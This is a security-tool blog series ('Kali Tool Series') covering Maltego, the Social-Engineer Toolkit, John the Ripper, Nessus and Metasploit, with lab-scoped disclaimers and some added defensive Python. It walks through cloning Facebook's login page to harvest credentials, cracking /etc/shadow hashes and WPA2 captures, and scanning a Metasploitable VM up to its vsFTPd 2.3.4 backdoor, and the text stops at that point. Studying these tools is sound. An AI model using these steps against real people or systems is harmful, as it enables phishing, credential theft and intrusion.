<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsV_uhy1tcGV8a8LX65pIkMUx-wf32-ca_x5qZnsM8ZXFRFtF_oVqTyhonW2193Hn0oadwBKfYSW2nt1CRIsHSrNYRa2tkrTLrQvm9F-NWt9NDL5FuF5zY3mTXyNRy9zuWVv6njA9MxNqK/s1600/Screen+Shot+2016-03-29+at+4.41.31+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsV_uhy1tcGV8a8LX65pIkMUx-wf32-ca_x5qZnsM8ZXFRFtF_oVqTyhonW2193Hn0oadwBKfYSW2nt1CRIsHSrNYRa2tkrTLrQvm9F-NWt9NDL5FuF5zY3mTXyNRy9zuWVv6njA9MxNqK/s640/Screen+Shot+2016-03-29+at+4.41.31+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Information gathering starting from me, "Heron Yang".</td></tr>
</tbody></table>
<br />
<h3 id="transformseeds">
Transform Seeds</h3>
Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book where you can use that to see where the relevant content is located.<br />
<br />
<h3 id="reference">
Reference</h3>
<ul>
<li><a href="https://www.packtpub.com/networking-and-servers/web-penetration-testing-kali-linux">Web Penetration Testing with Kali Linux</a></li>
<li><a href="https://www.cybrarypentesting.com/information-gathering-with-maltego/">Maltego tutorial of Information gathering tools in Kali Linux</a></li>
<li><a href="http://dev.paterva.com/developer/system/TDS_Transforms/server/seeds.php">Seeds</a></li>
</ul>
Heron Yang<br />
<h2 id="kalitoolseriesthesocialengineertoolkit">Kali Tool Series - The Social-Engineer Toolkit</h2>
Published 2016-03-25.<br />
<h3 id="preface">
Preface</h3>
“Social Engineering” is a sub-field of network security. It is less about technical details and more about deceiving people in order to get into a system without authorization.<br />
<br />
<strong>The content here is only for study purposes; one SHOULD NOT deploy it in a real-world environment, which is illegal. While you practice, make sure you test on your own machines only and don’t defraud people</strong>.<br />
<br />
<h3 id="buildafishingwebsite">
Build a Phishing Website</h3>
As the basic example, we build a fake login website for people to enter a username and password.<br />
<pre><code>> setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack> 3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
</code></pre>
Then it asks for the IP of your Kali machine, which you can find with the <code>ifconfig</code> command. Mine is 192.168.63.155.<br />
<pre><code>set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
</code></pre>
Now you’re all set. By default, the files are generated in <code>/var/www/</code>. However, we have to move them into <code>/var/www/html/</code>, which is the default document root of Apache here.<br />
<pre><code>> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
</code></pre>
Okay, then open the URL (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS47zzM7icwDnX0leWUuvKsA0IIKuBhzQRmCBy8qMDD1Afkov2rS0rDnn4ihg5UKedsiSt8tl-sF1Ol1vNBo17POlf08qTYPr3HoIOUljF8tYThxtxhiyHC3drV9VJ-sM4g4oXJoytBCj8/s1600/Screen+Shot+2016-03-25+at+4.11.06+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS47zzM7icwDnX0leWUuvKsA0IIKuBhzQRmCBy8qMDD1Afkov2rS0rDnn4ihg5UKedsiSt8tl-sF1Ol1vNBo17POlf08qTYPr3HoIOUljF8tYThxtxhiyHC3drV9VJ-sM4g4oXJoytBCj8/s640/Screen+Shot+2016-03-25+at+4.11.06+PM.png" width="640" /></a></div>
<br />
<br />
Finally, you will find the username and password in the harvester_….txt file:<br />
<pre><code>> cat /var/www/html/har*.txt
Array
(
[lsd] => AVqaOX85
[display] =>
[enable_profile_selector] =>
[isprivate] =>
[legacy_return] => 1
[profile_selector_ids] =>
[skip_api_login] =>
[signed_next] =>
[trynum] => 1
[timezone] => -825
[lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
[lgnrnd] => 194144_MLVw
[lgnjs] => 1458894004
[email] => apple
[pass] => banana
[login] => 1
[default_persistent] => 0
[qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)
</code></pre>
Heron Yang<br />
<h2 id="kalitoolseriesjohntheripper">Kali Tool Series - John the Ripper</h2>
Published 2016-03-19.<br />
<p>John the Ripper is a tool for recovering passwords by brute force. <strong>Make sure you don’t apply any of the following to others’ accounts or services.</strong> Try your own accounts or services.</p>
<h3 id="getpasswordofanunix-likemachine">Get Password of an Unix-like Machine</h3>
<p>The following only works on a Unix-like machine to which you already have file access. That is, we need <code>/etc/passwd</code> and <code>/etc/shadow</code> (only <code>/etc/passwd</code> on ancient machines).</p>
<pre><code>> unshadow /etc/passwd /etc/shadow > ~/passwd
</code></pre>
<p>Use John’s default word list to crack the password:</p>
<pre><code>> john ~/passwd
</code></pre>
<p>Use custom wordlist:</p>
<pre><code>> john --wordlist=word.list ~/passwd
</code></pre>
<p>where <code>word.list</code> is your custom list.</p>
<p>To show the result:</p>
<pre><code>> john --show ~/passwd
</code></pre>
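<p>The <code>unshadow</code> step above is a plain join of the two files: the <code>x</code> in the password field of <code>/etc/passwd</code> is replaced with the hash from the matching <code>/etc/shadow</code> line. The following is an added example, not code from the original post or from John the Ripper, that reimplements that join on constructed file contents and then reports which accounts carry a hash at all, which is the first thing a password audit should establish (locked <code>!</code>/<code>*</code> accounts never match a wordlist). The user names, dates and hash strings are placeholders, not real digests.</p>

```python
"""Added example, not part of the original post or of John the Ripper: what
`unshadow` does, reimplemented on constructed /etc/passwd and /etc/shadow
contents, plus a check of which accounts carry a hash worth auditing at all.
The hash strings are placeholders, not real digests."""

# Constructed file contents; field layout follows passwd(5) and shadow(5).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
"""
SHADOW = """\
root:$6$saltsalt$PLACEHOLDERSHA512CRYPT:16880:0:99999:7:::
daemon:*:16880:0:99999:7:::
alice:!$6$saltsalt$PLACEHOLDERLOCKED:16880:0:99999:7:::
"""

# crypt(3) scheme identifiers found at the start of a modern hash field.
HASH_SCHEMES = {"$1$": "md5crypt", "$2b$": "bcrypt", "$5$": "sha256crypt",
                "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_colon_file(text):
    """Map the user name (first field) to the full list of fields."""
    entries = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            entries[fields[0]] = fields
    return entries


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): the 'x' in passwd field 2 becomes the hash."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for user, fields in parse_colon_file(passwd_text).items():
        if fields[1] == "x" and user in shadow:
            fields = [user, shadow[user][1]] + fields[2:]
        merged.append(":".join(fields))
    return merged


def hash_scheme(hash_field):
    """Name the crypt(3) scheme from the '$id$' prefix, or None if unknown."""
    for prefix, name in HASH_SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    return None


def crackable_accounts(merged_lines):
    """(user, scheme) for accounts whose hash field is a real hash: not empty
    and not locked with a leading '*' or '!'. Locked accounts never match."""
    result = []
    for line in merged_lines:
        user, hash_field = line.split(":")[:2]
        if hash_field and not hash_field.startswith(("*", "!")):
            result.append((user, hash_scheme(hash_field)))
    return result


if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    print("\n".join(merged))
    print(crackable_accounts(merged))   # [('root', 'sha512crypt')]
```

<p>On a real system the scheme prefix also tells you how expensive each guess is: md5crypt hashes fall to a wordlist far faster than sha512crypt or yescrypt ones, so a host still using <code>$1$</code> should be migrated before worrying about wordlist choice.</p>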
<h3 id="crackwifi">Crack Wifi</h3>
<h4 id="usewordlistwpa2">Use Wordlist (WPA2)</h4>
<p>Use <em>wireshark</em> or <em>airodump-ng</em> to get .cap file of the traffic. Then:</p>
<pre><code>> aircrack-ng -w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap
</code></pre>
<p>where the -b option gives the MAC of your target BSSID, and the input files are the .cap files.</p>
<h4 id="tryall">Try All</h4>
<p>Another solution is to try every possible password, which is guaranteed to find the password but might also take forever.</p>
<pre><code>> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap
</code></pre>
<h3 id="sessioncontrol">Session Control</h3>
<p>To run a long password-testing process, we can make it run in the background:</p>
<pre><code>> john --session=all_rules_session --wordlist=all.lst &
</code></pre>
<p>To check the session status:</p>
<pre><code>> john --status=all_rules_session
0g 0:00:00:02 2/3 0g/s 411.5p/s 411.5c/s 411.5C/s
</code></pre>
<p>To restore the session:</p>
<pre><code>> john --restore
</code></pre>
<h3 id="passwordwordlist">Password Wordlist</h3>
<p>Longer wordlists can be found online. However, Kali already ships with several wordlists for users to apply.</p>
<pre><code>> ls /usr/share/wordlists/
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz
</code></pre>
<p>They are wordlist files from different applications:</p>
<pre><code>> file /usr/share/wordlists/*
/usr/share/wordlists/dirb: symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster: symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz: symbolic link to /usr/share/wfuzz/wordlist
</code></pre>
<p>Interestingly, the most useful wordlist is actually hidden in the compressed <code>rockyou.txt.gz</code>, so:</p>
<pre><code>> gzip -dc < rockyou.txt.gz > ~/wordlist.txt
</code></pre>
<p>which gives us wordlist.txt.</p>
<h3 id="resource">Resource</h3>
<ul>
<li><a href="http://www.openwall.com/john/doc/EXAMPLES.shtml">John the Ripper usage examples</a></li>
<li><a href="https://www.corelan.be/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/">Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper</a></li>
</ul>
<h2 id="kalitoolseriesnessus">Kali Tool Series - Nessus</h2>
<p>Heron Yang, 2016-03-14</p>
Nessus is an open source <strong>vulnerability scanner</strong>, which scans a network for potential security risks and provides detailed reports.<br />
Few facts about Nessus:<br />
<ul>
<li>founded by Renaud Deraison in 1998</li>
<li>supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc</li>
</ul>
<h3 id="feature">
Feature</h3>
<ul>
<li>host/port discovery</li>
<li>identifies vulnerabilities</li>
<li>checks whether the systems have the latest software patches</li>
<li>tries with default passwords, common passwords on system accounts</li>
<li>malware/botnet detection</li>
</ul>
(from <a href="http://www.securitylearn.net/tag/nessus-tutorial/">reference 1</a> and <a href="https://www.cybrarypentesting.com/nessus-vulnerability-scanner-tutorial/">reference 2</a>)<br />
<h3 id="installandsetup">
Install and Setup</h3>
Download Nessus from <a href="http://www.tenable.com/products/nessus/select-your-operating-system">its official site</a> (registration is required; the Home version is free).<br />
After installation, open <a href="https://localhost:8834/">https://localhost:8834/</a> on your machine to start Nessus.<br />
<h3 id="component">
Component</h3>
<ul>
<li><strong>Reports</strong>: reports from all the past scans of a target or a set of targets</li>
<li><strong>Scans</strong>: configure or run a new scan</li>
<li><strong>Policies</strong>: configure the things you would like to run for the scans</li>
<li><strong>Users</strong>: different users may be granted different permissions and so may use different policies</li>
</ul>
(<a href="https://jonathansblog.co.uk/vulnerability-scanning-with-nessus-tutorial">Reference</a>)<br />
<h3 id="policy">
Policy</h3>
Open <a href="https://localhost:8834/">https://localhost:8834/</a>, and click on “+New Policy” button in the Policy tab.<br />
The information of scanner templates provided by the policy wizard can be found <a href="https://www.cybrarypentesting.com/nessus-scan-policies-and-report/">here</a>.<br />
<h4 id="settings">
Settings</h4>
<ul>
<li><strong>Basics</strong>
<ul>
<li>general: name / description</li>
<li>permission: private / share</li>
</ul>
</li>
<li><strong>Discovery</strong>: host discovery / port scanning / service discovery</li>
<li><strong>Assessment</strong>: for “web application” only</li>
<li><strong>Report</strong>: configure the scan reports</li>
<li><strong>Advanced</strong>: performance settings, additional checks, and logging features</li>
</ul>
<h3 id="scan">
Scan</h3>
Click the “+New Scan” button, then pick a scanner template or a user-created policy.<br />
<h4 id="general">
General</h4>
<ul>
<li>name</li>
<li>description</li>
<li>folder</li>
<li>scanner</li>
<li>targets: IP or domain name (ex. <code>192.168.1.0/24, 192.168.2.1, example.com</code>)</li>
<li>upload targets: a file that contains target list</li>
</ul>
<h4 id="schedule">
Schedule</h4>
Disabled by default.<br />
<ul>
<li>launch: pick its frequency - once, daily, weekly, monthly, or yearly</li>
<li>starts on: start time</li>
<li>time zone</li>
<li>summary</li>
</ul>
<h4 id="emailnotification">
Email Notification</h4>
Setting up SMTP is required.<br />
<h4 id="launch">
Launch</h4>
Click the play icon or the “Launch” button and the scan starts immediately.<br />
<h3 id="viewresults">
View Results</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKZC94Sb_z6uXxxAREJpGuiSEIsNcTcNw2u0zD7XLqq3qjClzYs8EWduN3SGZjsqvfvsTOldHKzSqg79mbbacXXyyksALB_we03fecj_M8JQM-P2fxky7Pr3NsLXKwshrYKoGHhh0SsX-/s1600/Screen+Shot+2016-03-14+at+1.53.01+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKZC94Sb_z6uXxxAREJpGuiSEIsNcTcNw2u0zD7XLqq3qjClzYs8EWduN3SGZjsqvfvsTOldHKzSqg79mbbacXXyyksALB_we03fecj_M8JQM-P2fxky7Pr3NsLXKwshrYKoGHhh0SsX-/s640/Screen+Shot+2016-03-14+at+1.53.01+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The result page</td></tr>
</tbody></table>
<div>
<br /></div>
<ul>
<li><strong>Configure</strong>: directs back to the scan settings</li>
<li><strong>Audit Trail</strong>: pulls up the audit trail dialogue</li>
<li><strong>Launch</strong></li>
<li><strong>Export</strong>: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.</li>
</ul>
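<p>The exported <code>.nessus</code> file is XML, which makes it easy to turn a scan into a prioritised fix list without going back to the web UI. The following is an added example (my own code, not Tenable's, and not from the post) that flattens a <code>.nessus</code> v2 export into one record per finding, counts findings per severity and lists the ones at or above a threshold, worst first. The embedded report is constructed sample data: the hosts, plugin names and the <code>pluginID="0"</code> values are placeholders, not real Nessus plugins.</p>

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Severity codes used in the .nessus v2 ReportItem "severity" attribute.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample export: two hosts, four findings. Plugin IDs and names
# are placeholders, not real Nessus plugins.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="lab-scan">
  <ReportHost name="192.168.1.10">
   <HostProperties>
    <tag name="host-ip">192.168.1.10</tag>
    <tag name="operating-system">Linux (placeholder)</tag>
   </HostProperties>
   <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="4"
               pluginID="0" pluginName="PLACEHOLDER outdated FTP server" pluginFamily="FTP">
    <risk_factor>Critical</risk_factor>
    <solution>Upgrade the FTP server.</solution>
   </ReportItem>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="2"
               pluginID="0" pluginName="PLACEHOLDER weak SSH ciphers" pluginFamily="Misc.">
    <risk_factor>Medium</risk_factor>
    <solution>Disable weak ciphers.</solution>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
               pluginID="0" pluginName="PLACEHOLDER OS identification" pluginFamily="General">
    <risk_factor>None</risk_factor>
   </ReportItem>
  </ReportHost>
  <ReportHost name="192.168.1.20">
   <HostProperties>
    <tag name="host-ip">192.168.1.20</tag>
   </HostProperties>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
               pluginID="0" pluginName="PLACEHOLDER SMB signing not required" pluginFamily="Windows">
    <risk_factor>High</risk_factor>
    <solution>Enforce SMB signing.</solution>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Flatten a .nessus v2 export into one dict per finding."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        # HostProperties/tag elements carry per-host facts such as host-ip.
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        for item in host.iter("ReportItem"):
            findings.append({
                "host": props.get("host-ip", host.get("name")),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "service": item.get("svc_name", ""),
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID", ""),
                "name": item.get("pluginName", ""),
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def summarize_by_severity(findings):
    """Count findings per severity label, e.g. {'Critical': 1, 'Medium': 1}."""
    return Counter(SEVERITY_NAMES.get(f["severity"], "Unknown") for f in findings)


def actionable(findings, min_severity=3):
    """Findings at or above the threshold, worst first, then by host and port."""
    keep = [f for f in findings if f["severity"] >= min_severity]
    return sorted(keep, key=lambda f: (-f["severity"], f["host"], f["port"]))


def hosts_with_critical(findings):
    """Hosts carrying at least one Critical finding."""
    return sorted({f["host"] for f in findings if f["severity"] == 4})


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS)
    print(dict(summarize_by_severity(found)))
    for f in actionable(found):
        sev = SEVERITY_NAMES[f["severity"]]
        print(f"{f['host']}:{f['port']}/{f['protocol']} {sev}: {f['name']} -> {f['solution']}")
```

<p>To use it on a real export, read the <code>.nessus</code> file into a string and pass it to <code>parse_nessus</code>; the Info-level items (severity 0) are what make raw exports noisy, which is why the fix list filters on severity rather than on plugin family.</p>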
<h3 id="turnonoffnessus">
Turn On/Off Nessus</h3>
Nessus runs as a background service by default. On macOS it is controlled through launchctl:<br />
To turn on:<br />
<pre><code>sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
</code></pre>
To turn off:<br />
<pre><code>sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
</code></pre>
<h2 id="kalitoolseriesmetasploit">Kali Tool Series - Metasploit</h2>
<p>Heron Yang, 2016-03-12 (updated 2016-03-19)</p>
<h3 id="preface">Preface</h3>
<p>This is the first post of <em>Kali Tool Series</em> I wrote as my own studying notes.</p>
<h3 id="introduction">Introduction</h3>
<p>Metasploit is a vulnerability and exploitation framework with a collection of exploits, designed for security professionals to perform security assessments.</p>
<p>Few facts about Metasploit:</p>
<ul>
<li>written in Ruby</li>
<li>acquired by Rapid7</li>
<li>integrates with other common penetration testing tools: Nessus, Nmap</li>
</ul>
<p>It is also worth knowing that successfully exploiting a service requires the following elements (<a href="http://raidersec.blogspot.tw/2012/03/introduction-to-metasploit.html">reference</a>):</p>
<ul>
<li><strong>vulnerability</strong>: a flaw in a system which can be utilized as an avenue of attack</li>
<li><strong>exploit</strong>: a program specifically designed to leverage a vulnerability</li>
<li><strong>payload</strong>: code to be run on the system <em>after</em> the vulnerability has been exploited</li>
</ul>
<h3 id="modules">Modules</h3>
<p>Before starting, it helps to understand the module types in Metasploit, which can be roughly grouped as follows (reference is <a href="https://www.gracefulsecurity.com/introduction-to-metasploit/">here</a>):</p>
<h4 id="auxiliarymodules">Auxiliary modules</h4>
<p>Helper tools for tasks such as:</p>
<ul>
<li>information gathering</li>
<li>enumeration</li>
<li>port scanning</li>
<li>connecting to SQL databases</li>
<li>etc</li>
</ul>
<h4 id="exploitmodules">Exploit modules</h4>
<p>Modules used to deliver exploit code to a target system.</p>
<h4 id="postmodules">Post modules</h4>
<p>Post-exploitation tools for things like extracting password hashes or access tokens, taking screenshots, key-logging and downloading files.</p>
<h4 id="payloadmodules">Payload modules</h4>
<p>Code that runs on the target after exploitation. In Metasploit the usual choice is the “meterpreter” payload, which opens a Meterpreter session on the target.</p>
<h3 id="testingenvironment">Testing Environment</h3>
<p>Since what we do here changes (or, you could say, damages) the target machine, we <em>cannot do this on a deployed machine without permission</em>. Therefore I set up a <a href="https://www.offensive-security.com/metasploit-unleashed/requirements/">Metasploitable virtual machine</a> as my target; it contains many vulnerabilities by default.</p>
<p>Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.</p>
<h3 id="workingflow">Working Flow</h3>
<p>Here’s a demo flow using Metasploit. </p>
<h4 id="1.informationgathering">1. Information Gathering</h4>
<p><strong>Host Discovery</strong></p>
<p>First, we have to locate the machine by scanning my local network (192.168.0.x).</p>
<p>I’m using ARP scanning:</p>
<pre><code>msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p>As we can see, 192.168.63.156 must be our target machine, since the other addresses belong to the VMware virtual network itself rather than to a guest.</p>
<p>In addition, of course, one can use Nmap to do all the work for this part instead:</p>
<pre><code>nmap -v -sV 192.168.63.1/24
</code></pre>
<p><strong>Port Scanning</strong></p>
<p>Then we scan for open ports on our target machine (192.168.63.156):</p>
<pre><code>msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
   THREADS      50               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (truncated)
</code></pre>
<p>Knowing which ports are open tells us which services are likely running on the machine.</p>
<h4 id="2.findvulnerability">2. Find Vulnerability</h4>
<p>To find a vulnerability we need the version of each service, then look it up in a vulnerability database to see whether anything is known for it.</p>
<p><strong>Find Versions</strong></p>
<p>SSH:</p>
<pre><code>msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run
[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p>FTP:</p>
<pre><code>msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run
[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p>As we can see, the target machine is running vsFTPd 2.3.4.</p>
<p><strong>Check Database</strong></p>
<p>Let’s focus on vsFTPd, which is more likely to be vulnerable than SSH. Go to <a href="http://www.exploit-db.com/search/">exploit-db</a>, search for the keyword “vsFTPd”, and luckily we find <a href="https://www.exploit-db.com/exploits/17491/">“VSFTPD 2.3.4 - Backdoor Command Execution”</a>.</p>
<p>To sum what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.</p>
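<p>From the defending side, the same banner → version → known flaw reasoning is what a service inventory check automates, so that an outdated daemon is found by the owner before it is found in an assessment. The following is an added example (my own code, not from the post or from Metasploit) that parses the two banners the version scanners above returned, flags the vsFTPd 2.3.4 build that exploit-db 17491 covers as known-bad, and compares everything else against a minimum-version baseline. <code>MIN_VERSION</code> is a placeholder policy of my own, not a vendor recommendation, and the OpenSSH portable patch level (the “p1”) is deliberately ignored.</p>

```python
import re

# Banners exactly as the ssh_version and ftp_version scanners printed them above.
SAMPLE_BANNERS = {
    ("192.168.63.156", 22): "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1",
    ("192.168.63.156", 21): "220 (vsFTPd 2.3.4)\r\n",
}

# Versions the post identifies as carrying a well-known flaw (exploit-db 17491).
KNOWN_BAD = {
    ("vsftpd", (2, 3, 4)): "VSFTPD 2.3.4 - Backdoor Command Execution (exploit-db 17491)",
}

# Assumed internal baseline: the oldest version accepted per product.
# Placeholder policy values for the example, not vendor guidance.
MIN_VERSION = {"openssh": (7, 0), "vsftpd": (3, 0)}

# (product, regex capturing the dotted version) pairs; the OpenSSH "p1" suffix
# is not captured, so only the upstream release number is compared.
BANNER_PATTERNS = [
    ("openssh", re.compile(r"OpenSSH[_-](\d+(?:\.\d+)*)")),
    ("vsftpd", re.compile(r"vsFTPd\s+(\d+(?:\.\d+)*)", re.IGNORECASE)),
]


def parse_version(text):
    """'2.3.4' -> (2, 3, 4); tuples compare element-wise, as versions should."""
    return tuple(int(part) for part in text.split("."))


def identify(banner):
    """Return (product, version tuple), or None if the banner is not recognised."""
    for product, pattern in BANNER_PATTERNS:
        match = pattern.search(banner)
        if match:
            return product, parse_version(match.group(1))
    return None


def assess(banner):
    """Classify one banner as 'known-bad', 'below-baseline', 'ok' or 'unknown',
    with a short reason where one applies."""
    ident = identify(banner)
    if ident is None:
        return "unknown", None
    product, version = ident
    if (product, version) in KNOWN_BAD:
        return "known-bad", KNOWN_BAD[(product, version)]
    if version < MIN_VERSION.get(product, ()):
        shown = ".".join(str(p) for p in version)
        return "below-baseline", f"{product} {shown} is older than the baseline"
    return "ok", None


def assess_all(banners):
    """Run assess() over a {(host, port): banner} inventory."""
    return {key: assess(banner) for key, banner in banners.items()}


if __name__ == "__main__":
    for (host, port), (verdict, reason) in assess_all(SAMPLE_BANNERS).items():
        print(f"{host}:{port} {verdict}" + (f" - {reason}" if reason else ""))
```

<p>An unrecognised banner is reported as <code>unknown</code> rather than silently passed, so that a new service type shows up in the report and gets a pattern added, instead of disappearing from the inventory.</p>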
<p><strong>Find the Exploit Method</strong></p>
<p>Then search for it in Metasploit:</p>
<pre><code>msf > search vsftpd

Matching Modules
================

